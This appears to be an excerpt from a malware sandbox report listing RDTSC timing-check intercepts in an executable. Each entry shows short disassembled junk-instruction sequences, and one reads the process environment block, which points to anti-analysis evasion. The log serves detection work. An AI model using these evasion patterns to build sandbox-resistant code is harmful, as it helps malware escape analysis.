Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A23E0D second address: A23E17 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F9DF58A6BD6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A29CBA second address: A29CD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F9DF4F36016h 0x0000000a pop ebx 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e js 00007F9DF4F3601Ch 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A29CD0 second address: A29CE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9DF58A6BE5h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A2CA9A second address: A2CAFD instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F9DF4F3601Dh 0x0000000b jmp 00007F9DF4F36026h 0x00000010 popad 0x00000011 pushad 0x00000012 push ebx 0x00000013 pushad 0x00000014 popad 0x00000015 jmp 00007F9DF4F3601Ch 0x0000001a pop ebx 0x0000001b jmp 00007F9DF4F3601Ch 0x00000020 jmp 00007F9DF4F36029h 0x00000025 push ecx 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A36F6A second address: A36F70 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A35698 second address: A356B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9DF4F36025h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A356B1 second address: A356DE instructions: 0x00000000 rdtsc 0x00000002 jng 00007F9DF58A6BD6h 0x00000008 jmp 00007F9DF58A6BE6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jo 00007F9DF58A6BD6h 0x00000016 pushad 0x00000017 popad 0x00000018 pushad 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A356DE second address: A356E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A35852 second address: A3585C instructions: 0x00000000 rdtsc 0x00000002 je 00007F9DF58A6BE2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A35CDD second address: A35CE1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A35CE1 second address: A35CF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push esi 0x0000000b pop esi 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e je 00007F9DF58A6BD6h 0x00000014 push eax 0x00000015 pop eax 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A35CF8 second address: A35D22 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F9DF4F3601Eh 0x00000008 pushad 0x00000009 popad 0x0000000a jg 00007F9DF4F36016h 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F9DF4F36028h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A35E94 second address: A35E9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F9DF58A6BD6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A35E9E second address: A35EB0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c jne 00007F9DF4F36016h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A35EB0 second address: A35ED1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jno 00007F9DF58A6BD6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jmp 00007F9DF58A6BDAh 0x00000012 jnc 00007F9DF58A6BD6h 0x00000018 pop eax 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A35ED1 second address: A35ED7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A36D6A second address: A36D99 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9DF58A6BE5h 0x00000007 jmp 00007F9DF58A6BE6h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A36D99 second address: A36DD6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 jmp 00007F9DF4F36022h 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jns 00007F9DF4F3602Dh 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A36DD6 second address: A36DFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F9DF58A6BD6h 0x0000000a popad 0x0000000b push edi 0x0000000c jmp 00007F9DF58A6BE7h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A34BB7 second address: A34BC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A34BC0 second address: A34BCA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F9DF58A6BD6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A3C793 second address: A3C799 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A3C799 second address: A3C79D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A3C79D second address: A3C7A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A3C7A1 second address: A3C7AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A3C1DF second address: A3C202 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F9DF4F36023h 0x0000000b push eax 0x0000000c push edx 0x0000000d jl 00007F9DF4F36016h 0x00000013 push esi 0x00000014 pop esi 0x00000015 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A3C35C second address: A3C36C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9DF58A6BDCh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A499B9 second address: A499BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A4AFF4 second address: A4B003 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push edx 0x00000004 pop edx 0x00000005 jno 00007F9DF58A6BD6h 0x0000000b pop ebx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A4B003 second address: A4B015 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 pop eax 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A4B015 second address: A4B03A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jnl 00007F9DF58A6BD6h 0x0000000c popad 0x0000000d jmp 00007F9DF58A6BE8h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A4B03A second address: A4B046 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push edi 0x00000006 pop edi 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A5181E second address: A51822 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A51822 second address: A5182D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A5182D second address: A51852 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F9DF58A6BD6h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d pushad 0x0000000e ja 00007F9DF58A6BD6h 0x00000014 jmp 00007F9DF58A6BDFh 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A51852 second address: A51857 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A51857 second address: A51868 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push esi 0x00000004 pop esi 0x00000005 pushad 0x00000006 popad 0x00000007 pop edi 0x00000008 pushad 0x00000009 je 00007F9DF58A6BD6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A51868 second address: A5186E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A5186E second address: A51874 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A5C09C second address: A5C0A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A5C0A0 second address: A5C0A5 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A5C0A5 second address: A5C0B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jg 00007F9DF4F3601Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A62BEB second address: A62BFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 popad 0x00000009 pushad 0x0000000a ja 00007F9DF58A6BD6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A62BFD second address: A62C14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 js 00007F9DF4F36016h 0x0000000c popad 0x0000000d pop ecx 0x0000000e push esi 0x0000000f jc 00007F9DF4F3601Ch 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A69F44 second address: A69F5E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F9DF58A6BE5h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A68A3D second address: A68A41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A68A41 second address: A68A45 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A68D24 second address: A68D2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A68D2A second address: A68D31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A68D31 second address: A68D5F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9DF4F3601Ah 0x00000007 js 00007F9DF4F3602Ch 0x0000000d jmp 00007F9DF4F36024h 0x00000012 pushad 0x00000013 popad 0x00000014 pop edx 0x00000015 pop eax 0x00000016 pushad 0x00000017 push eax 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A68D5F second address: A68D6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A68E86 second address: A68E91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A6914A second address: A6914E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A69C5A second address: A69C68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F9DF4F36016h 0x0000000a pop ebx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A69C68 second address: A69C96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9DF58A6BE1h 0x00000009 jmp 00007F9DF58A6BE7h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A6DB8E second address: A6DB96 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A87DAA second address: A87DB0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A87DB0 second address: A87DB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 98171D second address: 981721 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A8E83E second address: A8E844 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A8D703 second address: A8D707 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A8D707 second address: A8D73D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9DF4F36029h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push edx 0x0000000b jnc 00007F9DF4F36016h 0x00000011 jbe 00007F9DF4F36016h 0x00000017 pop edx 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c jnc 00007F9DF4F36016h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A8D892 second address: A8D898 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A8D898 second address: A8D89F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A8D89F second address: A8D8C8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F9DF58A6BE3h 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F9DF58A6BDCh 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A8D8C8 second address: A8D8CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A9015F second address: A90163 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A92B44 second address: A92B48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A92B48 second address: A92B4C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A930EA second address: A9311B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007F9DF4F36016h 0x00000009 jbe 00007F9DF4F36016h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 mov dword ptr [esp], eax 0x00000015 sub dword ptr [ebp+122D3A1Eh], ecx 0x0000001b push dword ptr [ebp+122D2B8Eh] 0x00000021 and edx, dword ptr [ebp+122D33D0h] 0x00000027 push 45B2E513h 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A9311B second address: A93120 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A97C76 second address: A97C99 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007F9DF4F36025h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b js 00007F9DF4F3601Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A97C99 second address: A97C9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A97C9D second address: A97CA2 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A97CA2 second address: A97CA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D9046A second address: 4D90482 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9DF4F36024h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D90482 second address: 4D90486 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D90486 second address: 4D904AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007F9DF4F36029h 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D904AE second address: 4D904B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D904B5 second address: 4D904D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xchg eax, ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F9DF4F36024h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D90370 second address: 4D903A0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9DF58A6BE3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a xchg eax, ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F9DF58A6BE5h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D903A0 second address: 4D903E6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9DF4F36021h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007F9DF4F3601Ah 0x00000012 pushfd 0x00000013 jmp 00007F9DF4F36022h 0x00000018 adc al, 00000058h 0x0000001b jmp 00007F9DF4F3601Bh 0x00000020 popfd 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D4002D second address: 4D40055 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9DF58A6BDAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushad 0x0000000c mov di, 0DE2h 0x00000010 mov dh, 26h 0x00000012 popad 0x00000013 popad 0x00000014 xchg eax, ebp 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F9DF58A6BDCh 0x0000001c rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D40055 second address: 4D4005B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D4005B second address: 4D4007F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9DF58A6BDDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F9DF58A6BDDh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D4007F second address: 4D400D5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9DF4F36021h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr fs:[00000030h] 0x0000000f jmp 00007F9DF4F3601Eh 0x00000014 sub esp, 18h 0x00000017 jmp 00007F9DF4F36020h 0x0000001c xchg eax, ebx 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F9DF4F36027h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D400D5 second address: 4D400DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D400DB second address: 4D400DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D400DF second address: 4D40119 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9DF58A6BDBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d mov ax, dx 0x00000010 jmp 00007F9DF58A6BDBh 0x00000015 popad 0x00000016 xchg eax, ebx 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F9DF58A6BE5h 0x0000001e rdtsc
